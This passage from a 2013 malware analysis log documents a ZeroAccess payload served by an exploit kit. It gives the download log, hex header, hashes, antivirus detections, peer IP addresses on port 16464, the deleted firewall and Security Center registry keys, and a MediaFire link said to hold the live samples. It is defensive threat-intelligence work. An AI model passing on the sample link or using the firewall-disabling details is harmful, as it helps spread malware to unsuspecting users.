  458. Cache-Control: private
  459. Content-Disposition: attachment; filename="calc.exe"
  460. Content-Transfer-Encoding: binary
  461.   :
  462. 200 OK
  463. Registered socket 1892 for persistent reuse.
  464. Length: 167936 (164K) [application/x-msdownload]
  465. Saving to: `calc.exe'
  466. 2013-02-06 19:11:53 (84.4 KB/s) - `calc.exe' saved [167936/167936]
  467.  
  468. Sections:
  469.    .text 0x1000 0x10737 67584
  470.    .rdata 0x12000 0x3ec 1024
  471.    .data" 0x13000 0x18000 97792
  472.    .reloc 0x2b000 0x200 512
  473.  
  474. Entry Point at 0x1dfe
  475. Virtual Address is 0x4029fe
  476. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  477. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  478. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  479. 0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
  480. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  481. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  482. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  483. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  484. 0080   50 45 00 00 4C 01 04 00 9A 5D 59 40 00 00 00 00    PE..L....]Y@....
  485. 0090   00 00 00 00 E0 00 0E 83 0B 01 06 00 37 07 01 00    ............7...
  486.  
  487. Sample : ./calc.exe
  488. MD5    : 8f3f3be426c62710145252b8b031308d
  489. SHA256 : 9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5
  490. URL    : https://www.virustotal.com/latest-scan/9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5
  491.  
  492. Symantec                 : Suspicious.IRCBot
  493. ESET-NOD32               : a variant of Win32/Kryptik.ATSE
  494. Kaspersky                : HEUR:Trojan.Win32.Generic
  495. PCTools                  : HeurEngine.ZeroDayThreat
  496. McAfee                   : ZeroAccess.hr
  497. Malwarebytes             : Rootkit.0Access
  498. Fortinet                 : W32/ZAccess.BDGJ!tr.bdr
  499. Kingsoft                 : Win32.Troj.Undef.(kcloud)
  500. Microsoft                : VirTool:Win32/Obfuscator.XQ
  501.  
  502. ===============================
  503. // payload is ZeroAccess..,
  504. =============================
  505.  
  506. // see the networking below:
  507.  
  508. // DNS...
  509.  
  510. 194.165.17.3:53
  511. 66.85.130.234:53
  512.  
  513. // MALFORMED UDP...
  514.  
  515. 206.254.253.254:16464
  516. 190.254.253.254:16464
  517. 182.254.253.254:16464
  518. 180.254.253.254:16464
  519. 166.254.253.254:16464
  520. 135.254.253.254:16464
  521. 134.254.253.254:16464
  522. 119.254.253.254:16464
  523. 117.254.253.254:16464
  524. 115.254.253.254:16464
  525. 92.254.253.254:16464
  526. 88.254.253.254:16464
  527. 87.254.253.254:16464
  528. 71.254.253.254:16464
  529. 69.254.253.254:16464
  530. 46.150.37.29:16464
  531. 68.9.31.32:16464
  532. 69.133.27.61:16464
  533. 95.57.233.74:16464
  534. 94.210.172.145:16464
  535. 184.155.123.146:16464
  536. 194.165.17.3:123
  537. 91.242.217.247:123
  538. 75.95.95.148:16464
  539. 24.92.201.152:16464
  540. 222.254.253.254:16464
  541. 98.149.145.253:16464
  542. 66.65.129.254:16464
  543. 97.83.82.254:16464
  544. 190.190.239.72:16464
  545. 118.171.55.88:16464
  546. 14.97.157.71:16464
  547. 173.20.198.123:16464
  548. 24.186.214.38:16464
  549. 218.173.39.25:16464
  550. 116.193.142.246:16464
  551. 76.97.134.59:16464
  552. 68.204.131.69:16464
  553. 114.178.175.1:16464
  554. 118.171.44.79:16464
  555. 173.17.47.76:16464
  556. 123.143.96.27:16464
  557. 173.20.128.26:16464
  558. 90.94.246.250:16464
  559. 70.171.38.38:16464
  560. 79.136.67.28:16464
  561. 95.169.211.29:16464
  562. 87.111.189.32:16464
  563. 75.109.170.11:16464
  564. 97.89.4.235:16464
  565.  
  566. // See the registry keys deleted:
  567.  
  568. HKLM\System\CurrentControlSet\Services\SharedAccess\DependOnGroup      
  569. HKLM\System\CurrentControlSet\Services\SharedAccess\DependOnService "Netman"
  570. HKLM\System\CurrentControlSet\Services\SharedAccess\Description "Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network."
  571. HKLM\System\CurrentControlSet\Services\SharedAccess\DisplayName "Windows Firewall/Internet Connection Sharing (ICS)"
  572. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\0 "Root\LEGACY_SHAREDACCESS\0000"
  573. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\Count
  574. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\NextInstance
  575. HKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\Epoch
  576. HKLM\System\CurrentControlSet\Services\SharedAccess\ErrorControl
  577. HKLM\System\CurrentControlSet\Services\SharedAccess\ImagePath "%SystemRoot%\system32\svchost.exe -k netsvcs"
  578. HKLM\System\CurrentControlSet\Services\SharedAccess\ObjectName "LocalSystem"
  579. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%windir%\system32\sessmgr.exe   "%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
  580. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%windir%\system32\sessmgr.exe "%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
  581. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall
  582. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\ServiceDll       "%SystemRoot%\System32\ipnathlp.dll"
  583. HKLM\System\CurrentControlSet\Services\SharedAccess\Setup\InterfacesUnfirewalledAtUpdate\All
  584. HKLM\System\CurrentControlSet\Services\SharedAccess\Setup\ServiceUpgrade
  585. HKLM\System\CurrentControlSet\Services\SharedAccess\Start      
  586. HKLM\System\CurrentControlSet\Services\SharedAccess\Type       
  587. HKLM\System\CurrentControlSet\Services\wscsvc\DependOnService"RpcSs"
  588. HKLM\System\CurrentControlSet\Services\wscsvc\Description       "Monitors system security settings and configurations."
  589. HKLM\System\CurrentControlSet\Services\wscsvc\DisplayName       "Security Center"
  590. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\0 "Root\LEGACY_WSCSVC\0000"
  591. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\Count       
  592. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\NextInstance
  593. HKLM\System\CurrentControlSet\Services\wscsvc\ErrorControl     
  594. HKLM\System\CurrentControlSet\Services\wscsvc\ImagePath "%SystemRoot%\System32\svchost.exe -k netsvcs"
  595. HKLM\System\CurrentControlSet\Services\wscsvc\ObjectName        "LocalSystem"
  596. HKLM\System\CurrentControlSet\Services\wscsvc\Parameters\ServiceDll     "%SYSTEMROOT%\system32\wscsvc.dll"
  597. HKLM\System\CurrentControlSet\Services\wscsvc\Security\Security
  598. HKLM\System\CurrentControlSet\Services\wscsvc\Start
  599. HKLM\System\CurrentControlSet\Services\wscsvc\Type
  600.  
  601. //References::
  602.  
  603. http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  604. https://www.virustotal.com/file/9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5/analysis/1360145547/
  605. http://anubis.iseclab.org/?action=result&task_id=11b4576ba32704244115039855eaa5935
  606.  
  607. // we grabbed them all; they are in VirusTotal now.. MalwareMustDie!!!
  608.  
  609. 2013/02/06  18:32   110,246 209tuj2dsljdglsgjwrigslgkjskga.php 59be5511a32cb4dcfcceac7d6d9fbff9 (3/46)
  610. 2013/02/06  19:11   167,936 calc.exe                           8f3f3be426c62710145252b8b031308d (9/46)
  611. 2013/02/06  18:43    20,197 infector1.pdf                      8b22f32c404fb798bfa85899ab898ae2 (21/46)
  612. 2013/02/06  18:43    11,596 infector2.pdf                      20f9d0ed3589f893bad0dc0b2f3a23d3 (14/46)
  613. 2013/02/06  18:48    26,127 java1.jar                          fa7484b3de49e3dbbb5a1f3a51ae2a76 (8/46)
  614. 2013/02/06  18:49    16,640 java2.jar                          ba85a3efd20c73021b3680feeec19503 (9/46)
  615.  
  616. // Samples are here:
  617.  
  618. http://www.mediafire.com/?vu018ca7mp173a7
  619.  
  620. -----
  621. #MalwareMustDie!